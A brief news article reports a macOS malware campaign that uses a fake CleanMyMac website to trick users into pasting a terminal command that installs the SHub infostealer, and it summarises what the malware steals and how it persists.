Home / Technology / Mac Malware Tricks Users With Fake CleanMyMac
Mac Malware Tricks Users With Fake CleanMyMac
10 Mar
Summary
- Fake utility spoofs CleanMyMac, creating a convincing fake website.
- Users are tricked into pasting terminal commands to install malware.
- Malware steals credentials, crypto, and installs a backdoor for persistence.
A malicious campaign is deceiving macOS users with a fake utility that mimics the legitimate CleanMyMac software. Researchers have identified a fake website designed to look identical to the official CleanMyMac site, tricking users into downloading a malicious program.
Instead of a straightforward installation, victims are prompted to open a terminal and paste a command. This method bypasses macOS security features like Gatekeeper, allowing the SHub infostealer to be installed. SHub requests the user's macOS password, granting it access to sensitive data including the Keychain and Wi-Fi credentials.
The malware systematically steals passwords, private keys, cryptocurrency wallets, and iCloud data. It then installs a backdoor, replacing cryptocurrency apps with malicious versions to ensure persistence and facilitate further theft. Attackers also establish persistence by spoofing Google update services, enabling them to execute commands on infected Macs remotely.
